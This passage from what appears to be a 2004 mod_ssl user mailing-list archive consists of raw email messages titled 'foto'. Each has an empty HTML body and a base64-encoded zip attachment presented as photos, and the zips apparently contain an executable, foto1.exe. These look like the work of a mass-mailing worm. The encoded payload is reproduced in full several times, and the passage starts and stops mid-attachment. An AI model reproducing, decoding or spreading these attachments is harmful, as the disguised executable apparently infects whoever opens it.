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
AA==

----------mhosrhxtcevlpfhazpiz--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 31 22:34:54 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 41C38A8A7D; Tue, 31 Aug 2004 22:34:54 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from EDYE.org (pcp09512787pcs.nrockv01.md.comcast.net [69.143.208.58])
	by master.modssl.org (Postfix) with SMTP id C2ADAA8995
	for ; Tue, 31 Aug 2004 22:34:52 +0200 (CEST)
Date: Tue, 31 Aug 2004 16:34:48 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------sqaoyiupbmirtrwoffpq"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------sqaoyiupbmirtrwoffpq
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------sqaoyiupbmirtrwoffpq
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

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
AA==

----------sqaoyiupbmirtrwoffpq--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 31 23:00:58 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7CB55A8943; Tue, 31 Aug 2004 23:00:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from MailServer.net (h-67-100-191-234.mclnva23.covad.net [67.100.191.234])
	by master.modssl.org (Postfix) with SMTP id F194CA8978
	for ; Tue, 31 Aug 2004 23:00:45 +0200 (CEST)
Date: Tue, 31 Aug 2004 16:56:25 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------xwzgnwbdfhzdwafkinza"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------xwzgnwbdfhzdwafkinza
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------xwzgnwbdfhzdwafkinza
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

UEsDBAoAAAAAAKGEITEAAAAAAAAAAAAAAAAFAAAAZm90by9QSwMEFAAAAAgAAI8hMR9CJh4i
AgAAYwQAAA4AAABmb3RvL2ZvdG8uaHRtbI1UUY+aQBB+v+T+wx4Ph+YKHNr0TA9MLFJj43HN
qfWxWWFYtsGFLKOeafzvXZBei5KmG0LYmfm+b2aYXScBGg2vr5wilDxHklLBtpSBq32hOzqv
jJry76gk8Ao5xcTV4wwzq3zZprLpjwpunfAqUm3m3sv064LMRsFkOZr451zOjWGcGNeCbsAV
dMcZxUyaNM8DZVGEsAeMERlxiYaSxQcWRTFjmnIlMTuwpPLAXgJKPFRP6atIdyDdnMoCpgI7
DfJvIAueie5jmWa8FSGqHeGiQJqmnS75eX1F6sVj0iF/wHlKMc7khtzetllvXKKvuOj3dNJg
+b3SLKSllilBYULo6MHzYjUN+r3V6CWYBhMzwU2ql4mdQ1WFWyn+chybSVY9JK5K4ImHMiuy
GIkqHKQAJP5rnmYSpF7mXTaGDF3Sa00xysLtBgSae8lRJehk6x8QIuGRqzG+1sieR+rn2yQB
zhJUH2FKi6J0e7P5dPzx3h58evC9vuH73siw7ahvDPwH27hXyx/0vA/e/VhTQmEWwZoWasT0
u3qk7nRt6FgnwWGjC0cCaQFnhQaARUhzaFT1vrUqlJwxFeASUYPMskPbPKII5uLkbel6KVhj
zWUV7Au6TiFqVTlTM+dIJc6Vzp5KOME7danv3oLG/ufRcrb4/vQ89ruXnHXl/1C7GKpaom2K
jhct/Z8pbSFURMfy9LwdmuosWRYxjGHjHnCs+mr5BVBLAwQKAAAAAAChhCExAAAAAAAAAAAA
AAAACgAAAGZvdG8vZm90by9QSwMEFAAAAAgAL48hMUNfuiVDEAAAADIAABMAAABmb3RvL2Zv
dG8vZm90bzEuZXhl7VoPcBzVeX8nCyOwYt8Qm2APE2Rjpw4THbJ0ZwhxJzqkE3Yq24dO0hlQ
MHu3T7d72ttd3u7qdCpMZYSmuKqpJzBt2jKZzJSm05Z6WgZ3nHQCArulLqS1O0xKA5Map002
mBIGq0VlVF9/7+2efOfbE5C0w9Dxs79v3/u+9773ve/9+7532n03ISFCSBOgXCakm3ip8n2m
/3sbSYPE6yQThPSHVpCJcixeoZ8ha0KrQle0kmYUIh5t6BqgMKDNbxn2Om3221S+5D5fmaVP
2Ku79F36iKRA3o5GCv4iCXKVZdgRm07Y+H5zha8QH0BTnYgzESZLtkTIy00eQdRbWVuvG/8j
